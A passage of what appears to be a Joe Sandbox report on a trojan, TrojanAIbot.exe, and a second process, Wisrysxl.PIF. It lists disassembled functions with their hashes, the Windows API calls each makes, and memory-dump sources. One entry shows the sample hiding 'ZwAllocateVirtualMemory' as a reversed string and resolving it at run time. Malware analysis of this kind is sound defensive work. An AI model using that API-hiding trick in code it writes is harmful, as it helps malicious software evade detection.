Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: Hq
API String ID: 2492992576-1594803414
Opcode ID: 2f48be1fadb43bd4e52a7273e8d8a265e1fdada0d8ef60396b67d10bb906474b
Instruction ID: da2ca2a167392d42c85294bcffe480ba38ae0747884ee9bc843bfd4c41f820c2
Opcode Fuzzy Hash: 2f48be1fadb43bd4e52a7273e8d8a265e1fdada0d8ef60396b67d10bb906474b
Instruction Fuzzy Hash: B8516D34744A128FDB68EB29D454B2E77E6BFC5A10F55806AE406CB3A1CF74DC42CB91

Function 015AD418 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0de5527e6a004b9d8b587cee0f507a43f347915e876e8757528cb9e994aab6b
Instruction ID: 6198d4ae633e2860583f63057c18242afd391af78b067589bf399e00e631f59a
Opcode Fuzzy Hash: b0de5527e6a004b9d8b587cee0f507a43f347915e876e8757528cb9e994aab6b
Instruction Fuzzy Hash: 85817870A00B058FEB24DF6AD04479EBBF1FF88204F44892ED48ADBA50D775E945CB90

Function 065E3E64 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E3F82

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6a3c5db5c5c5437f9383be27e8f6fb8ac36dc66cc17e0ae9e948b2d25c8ec26a
Instruction ID: 6fc3e5210f8f24bd84b4a3a6c96b21f324c77de12c0a2260e895b96c8b74a89e
Opcode Fuzzy Hash: 6a3c5db5c5c5437f9383be27e8f6fb8ac36dc66cc17e0ae9e948b2d25c8ec26a
Instruction Fuzzy Hash: 0F51C0B1D103499FDF15CFAAC984ADEBBB5BF48310F24812AE819AB214D7759885CF90

Function 065E3E70 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E3F82

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ecb524284b5e3ded8d737b4c4cd6c4c7cee3198e5a99ce63487141b65b6596c3
Instruction ID: 15c8eb0590020c689db24ef9191cbdb3b9de513816a7d0476030827cdfd1a120
Opcode Fuzzy Hash: ecb524284b5e3ded8d737b4c4cd6c4c7cee3198e5a99ce63487141b65b6596c3
Instruction Fuzzy Hash: A041C0B1D103099FDF14CF9AC984ADEFBB5BF48310F24812AE819AB210D775A885CF90

Function 065EF8A8 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 328a6031ce38514511d5815b954a349e9087b6e6a0a00869a35fba05b6651cf4
Instruction ID: e92324996416c9f779c644809c88f8c98ae827e916265f03248a09cf66df2bbc
Opcode Fuzzy Hash: 328a6031ce38514511d5815b954a349e9087b6e6a0a00869a35fba05b6651cf4
Instruction Fuzzy Hash: 94317A729043599FDB15CFAAD800AEEBFF9FF49310F14806AE994A7261C3359854CFA1

Function 065E65DE Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 065E6671

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 53f6d549178f69898b0cad4d9a7e74db3cdd3fe264e0ab6ee1c83250c85ea84b
Instruction ID: 1292750551a09e77a6b76cb75c3cfc3e0b646c83eaf11a69a875338234d2bde5
Opcode Fuzzy Hash: 53f6d549178f69898b0cad4d9a7e74db3cdd3fe264e0ab6ee1c83250c85ea84b
Instruction Fuzzy Hash: 983118B9A10205CFDB58CF95C448BAABBF5FF98314F28C499D5199B321D334A841CFA0

Function 0666483C Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 066648D0

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 7ac866191ab25a9cac93f4713e22c500a5885ac6ffd9c38e7f022190e14c4230
Instruction ID: b6b0ce98c5821f0a087bc6c06feba991fc9bf191bc5a574fef8ec0c87c11e5df
Opcode Fuzzy Hash: 7ac866191ab25a9cac93f4713e22c500a5885ac6ffd9c38e7f022190e14c4230
Instruction Fuzzy Hash: AB3123B4D01349DFDB54DF99D584BDEBBF1AB48304F248029E004AB390DBB5A845CB54

Function 066624CC Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 066648D0

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: d68c3c3897456b6c2a370c0c94387a17ce1526e9a1ff57b1b6a4a9a600fced6b
Instruction ID: 428aea79012203fe7537a770d4ef9d7f5fa0e455a5d7ff395e9035200c62f8cb
Opcode Fuzzy Hash: d68c3c3897456b6c2a370c0c94387a17ce1526e9a1ff57b1b6a4a9a600fced6b
Instruction Fuzzy Hash: 663104B0D01349EFDB54DF9AD544BDDBBF5AB48304F248059E404AB390DBB5A845CB91

Function 015AFD10 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AFD97

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8073b61562210a4e7b5a7f6a7277dc9c286b6731e285bb5b42039cf1288fca08
Instruction ID: c7bb2a126156ace99f04958ea04fb839642c4fc76bd914c8fcfcc8765503c5f1
Opcode Fuzzy Hash: 8073b61562210a4e7b5a7f6a7277dc9c286b6731e285bb5b42039cf1288fca08
Instruction Fuzzy Hash: 8B21E4B59003089FDB10CFAAD584ADEBBF8FB48310F14841AE958A7310C375A940CFA5

Function 015AFD0D Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AFD97

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 37946aaf6501dcc6c486d82485adcd6686460100c9ca5b710af5310dd60f493c
Instruction ID: 7d08f89f197c56248723c645d1317e019c5e459909194ca5754ba06bf94da0a5
Opcode Fuzzy Hash: 37946aaf6501dcc6c486d82485adcd6686460100c9ca5b710af5310dd60f493c
Instruction Fuzzy Hash: C121E4B5D002089FDB10CFAAD584BEEBBF5FB48310F14841AE958A7310D374A940CF64

Function 065ED520 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 065ED592

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 7576e2e649115df9f2c4f682a2d35e6837a90e29b1e068f177ba45daf82b9f32
Instruction ID: 9c9d2321046d53a37922c7dc9de463e952187a1a8f82e71f0a1f79ea0c8c1905
Opcode Fuzzy Hash: 7576e2e649115df9f2c4f682a2d35e6837a90e29b1e068f177ba45daf82b9f32
Instruction Fuzzy Hash: 532136B6D002498FDB14CF9AC444BEEBBF4FF88314F14856AD869A7250D378A645CF61

Function 065EE41C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,065EF8C2,?,?,?,?,?), ref: 065EF967

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 23aa5478c43106b938c751f7ba65e1888b252a7a897827fe5be8bc253d1c5171
Instruction ID: 2f98c9cefebac05aad8972675546779d1b1df8af496696141d6240f043b8b660
Opcode Fuzzy Hash: 23aa5478c43106b938c751f7ba65e1888b252a7a897827fe5be8bc253d1c5171
Instruction Fuzzy Hash: 921156B290034D9FDB10CFAAC844BEEBBF8FB48310F14841AE954A7250C375A950CFA4

Function 065ED528 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 065ED592

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 27e71bd9b71dbfd42815fa4ce64926aa55f3966816cb6f164a6af98f73a6d954
Instruction ID: 5705e93f757fcf548fad606ea4aadff8157eb3cc57c693db12a62d8b3db00f16
Opcode Fuzzy Hash: 27e71bd9b71dbfd42815fa4ce64926aa55f3966816cb6f164a6af98f73a6d954
Instruction Fuzzy Hash: 4D1103B6C002498FDB14CF9AC444BEEBBF4EF88310F14842AD868A7250D379A545CFA5

Function 065EE460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,065EFC59,?,?,00000000), ref: 065EFCCD

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 65df7fc1f47e9db3820c274f6307e5b5a3d753cdd90520697cc900e0db55353f
Instruction ID: ecc83c208dab558a8d772c9deb85f70eb6c9cb83ad77b43ab4800e8bfc350469
Opcode Fuzzy Hash: 65df7fc1f47e9db3820c274f6307e5b5a3d753cdd90520697cc900e0db55353f
Instruction Fuzzy Hash: E01106B5904349DFDB20DF9AD544BEEBBF8FB48310F20841AE958A7210C375A944CFA5

Function 065EFC68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,065EFC59,?,?,00000000), ref: 065EFCCD

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fbabdbcce5bd8e9c3bcb29bbd80a9391f9a3159744712faba71943aa7c16553f
Instruction ID: b4f1c9b6f8cb8a1e9aa23b827954a86596307aca178ccc4573311cd6490f97f2
Opcode Fuzzy Hash: fbabdbcce5bd8e9c3bcb29bbd80a9391f9a3159744712faba71943aa7c16553f
Instruction Fuzzy Hash: C41103B69003498FDB20DF9AD945BEEBBF8FB48310F20841AE858A7650C375A544CFA5

Function 065E1B7C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065E4115

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: c6c7a04e468e6c17b9ddc51139f0b0895af4c8456a12c0553fb072bb61547960
Instruction ID: 0b0c7b6e70e818e96f566dc169592ba3703c2ee7c53bf1104f75bf7eba0dd678
Opcode Fuzzy Hash: c6c7a04e468e6c17b9ddc51139f0b0895af4c8456a12c0553fb072bb61547960
Instruction Fuzzy Hash: 211136B58003088FDB20DF8AC484BDEBBF8FB48310F10841AD958A7300C375A944CFA5

Function 015AD618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015AD67E

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3a141a920b42448d1cca399ccb39b628557230c83a6b5bd589a1a3d533bc1818
Instruction ID: e6992bafb54a25b70dddb7cf761c34f6f29cd648cd5bd8a876c4673d4798c6a4
Opcode Fuzzy Hash: 3a141a920b42448d1cca399ccb39b628557230c83a6b5bd589a1a3d533bc1818
Instruction Fuzzy Hash: 341110B6C003498FDB24DF9AC444BDEFBF4FB88210F10842AD869AB610C379A545CFA5

Function 065E40B1 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065E4115

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 01931d2a2b0b460b5e6578e3b2a8a8d38d2c235e3631d6d26c48ae69b157eb44
Instruction ID: 681a3bbdfa1abd8e006f95ac07ac8cfcba314c0bf659bc93a6340fec7f3de9dc
Opcode Fuzzy Hash: 01931d2a2b0b460b5e6578e3b2a8a8d38d2c235e3631d6d26c48ae69b157eb44
Instruction Fuzzy Hash: AB1122B98003488FDB10CF9AD585BDEBBF8FB48210F20841AD858A7700C379A944CFA5

Function 0666225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06663687), ref: 06664125

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 3cc6cb7389bea23479dd675ddd0718ef34d76e7a0beba1e7c2f94732a93aaa70
Instruction ID: 479be80b11d326fadb17f95be2c454b9f633d03173819a372537ec381e4fa83f
Opcode Fuzzy Hash: 3cc6cb7389bea23479dd675ddd0718ef34d76e7a0beba1e7c2f94732a93aaa70
Instruction Fuzzy Hash: AE1122B5C046488FCB20DF9AE444BDEFBF4EB48310F10842AE418A3210D374A944CFA5

Function 066621B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0666319D

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 75fc3e89d1480a23c3513a22995664f040d54def1fb3ca15eecc077fe3f4aac0
Instruction ID: e4dd13fe420989183638a2a56272e5f801a0a7b951a20a2db527856679101c37
Opcode Fuzzy Hash: 75fc3e89d1480a23c3513a22995664f040d54def1fb3ca15eecc077fe3f4aac0
Instruction Fuzzy Hash: B91133B19003088FDB20DF9AD548BDEFBF4EB48210F208419E519B7300C375A944CFA4

Function 06663140 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0666319D

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5dc0dab7d052020134b7bf7e88ba372a20f29b77f4a68003f8ba9d12bedd2cfb
Instruction ID: 8cf1655bd97e62f73e8ab8bb7b58d89861737490a79b4b53ce549d2cbb0f2c4e
Opcode Fuzzy Hash: 5dc0dab7d052020134b7bf7e88ba372a20f29b77f4a68003f8ba9d12bedd2cfb
Instruction Fuzzy Hash: 281115B59003488FDB60DF9AD544BDEFBF4AB48210F24841AE459A7350C379A944CFA5

Function 065E66CF Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 065E6671

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d241d034204a7e5bf54fbc4cf465d63c2aa9cd1782c350a1253bc7b6df559d51
Instruction ID: ae95040395a28739315fef7fd4a686247cfd685b1a025b10742dec4aa793eeb8
Opcode Fuzzy Hash: d241d034204a7e5bf54fbc4cf465d63c2aa9cd1782c350a1253bc7b6df559d51
Instruction Fuzzy Hash: 7A01BC75924342CFDB64CF68E4847CABBF0FB95361F2082AAC02987650C7345445CB90

Function 066640C1 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06663687), ref: 06664125

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 329b486052ef0e24dd32700103613f6e3c9c3d3611162c5b428ebca208764ea1
Instruction ID: 836a2ba55f1e03d0b06c5191ec94cafa54262c11274865f04067697ec5486d66
Opcode Fuzzy Hash: 329b486052ef0e24dd32700103613f6e3c9c3d3611162c5b428ebca208764ea1
Instruction Fuzzy Hash: A71100B9D006498FDB20DF9AE544BDEFBF4EB48310F10852AE469A3650C379A544CFA5

Function 0142D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3780386574.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_142d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5743c4f3668637839bdeaa10aad9a49656315394260648bebefa92b341182da6
Instruction ID: 12872d0320a1f0a297e518520693515ed69f0d72392f1055c9ee23e2b74f0ecd
Opcode Fuzzy Hash: 5743c4f3668637839bdeaa10aad9a49656315394260648bebefa92b341182da6
Instruction Fuzzy Hash: C32125B1904340DFDB15DF54D880B16BBA1EB84318F64C56ED90A4B376C33AD487CA61

Function 0142D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3780386574.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_142d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fbe156f3010f1a60eac8de45592ec1dc63f3f37282364d8698341838eaee63b
Instruction ID: bcc363d55848668be5c3477121f61343b7760c5917302237bfc623a321c9d733
Opcode Fuzzy Hash: 8fbe156f3010f1a60eac8de45592ec1dc63f3f37282364d8698341838eaee63b
Instruction Fuzzy Hash: F62180755093808FDB13CF24D590716BF71EB46214F28C5EBD8498F6A7C33A984ACB62

Function 0141D07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3780112071.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_141d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943e2b7a281377cb1283453a080a112e6333018c2b5d597818b037a3e3ba2f21
Instruction ID: 0d8a82c4dd702340d112ad69b51f74a8cf65a1746be944f99d60292dcb9732f6
Opcode Fuzzy Hash: 943e2b7a281377cb1283453a080a112e6333018c2b5d597818b037a3e3ba2f21
Instruction Fuzzy Hash: 2901F7F19057409BE7205B69CC88767BF98EF41268F18C46BED0A0B29AC2759842CA72

Function 0141D07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3780112071.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_141d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fedc81c6deedb1faadaf118c8cd3fc0e000d66c9010dcf871cd888805479f08
Instruction ID: b10ef079fd95574d7c5d038cb80e0e318452e0e6fed7f868e51ee818f5eea451
Opcode Fuzzy Hash: 6fedc81c6deedb1faadaf118c8cd3fc0e000d66c9010dcf871cd888805479f08
Instruction Fuzzy Hash: 77F0C2B14043449EE7208A1ACDC8B63FF98EB41278F28C45BED490F29AC2799845CA71

Analysis Process: TrojanAIbot.exePID: 1204, Parent PID: 1040COMMON

Executed Functions

Function 00AF0839 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1a5dd80e093005e5baf57291cac4e3e4c228d98b1d4e5a4b18240024b2d174
Instruction ID: 8de384389aaf688402d137e2c81f4353abb9aaa3fc838ac5d1d7c4d549426e29
Opcode Fuzzy Hash: bb1a5dd80e093005e5baf57291cac4e3e4c228d98b1d4e5a4b18240024b2d174
Instruction Fuzzy Hash: D562CE74A01218CFDB64DF68D894B9DBBB2BF49305F2084E9D40AA7765EB359E81CF40

Function 00AF0848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143935c05b4e11b398538989766964121247e33527b55d1918e3b6cac0cc723f
Instruction ID: 31879e6a721230c758f336c15fca8fae1fadc8f87b38a5bd5362a68241518c20
Opcode Fuzzy Hash: 143935c05b4e11b398538989766964121247e33527b55d1918e3b6cac0cc723f
Instruction Fuzzy Hash: 4362BF74A01218CFDB64DF68D894B9DBBB2BF49305F2084E9D40AA7765EB359E81CF40

Function 00AF5233 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17dc47789ef6c34df9bae1146a03c1e9464eea88588265d43b9f922860f382c6
Instruction ID: 35bde9ef9aa2f1f6ae8c972238c64a2001eb172472e6632b2078019daf23fd0d
Opcode Fuzzy Hash: 17dc47789ef6c34df9bae1146a03c1e9464eea88588265d43b9f922860f382c6
Instruction Fuzzy Hash: 24012574C45219DFDB04EFB8C5583EEBBB0EB0A306F1099AAD516A3291DB780A84DF51

Function 00AF5238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75826516380307459debd9bb51267f5b50fc8d33cc64e9b30d95910857ea2738
Instruction ID: 417f2dcee867e8f030ee82a36430472fa84a8fe4f780dce9d1460f3f0833df29
Opcode Fuzzy Hash: 75826516380307459debd9bb51267f5b50fc8d33cc64e9b30d95910857ea2738
Instruction Fuzzy Hash: 54010874C40219DFDB04EFF4D5183AEBBB0EB09306F1099A99515A3290DB784A84DF51

Analysis Process: Wisrysxl.PIFPID: 4024, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1301
Total number of Limit Nodes:	21

Executed Functions

Function 02F37A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F

Strings

ntdll, xrefs: 02F37A74
yromeMlautriVetacollAwZ, xrefs: 02F37A47

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 6884cb6e36c087edc9bf99628b05b4a57a5e8b5fbc94ce3d06045e707ae77055
Instruction ID: 47e98d4e1aac86b5c4563eba46537cead4d23d687d5e355dad791ba17e3dd05d
Opcode Fuzzy Hash: 6884cb6e36c087edc9bf99628b05b4a57a5e8b5fbc94ce3d06045e707ae77055
Instruction Fuzzy Hash: 621157B5640208BFEB01EFA4DC91EAEF7EEEB49780F514460FA00D7200D674EA048F20

Function 02F37A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F

Strings

ntdll, xrefs: 02F37A74
yromeMlautriVetacollAwZ, xrefs: 02F37A47

Memory Dump Source

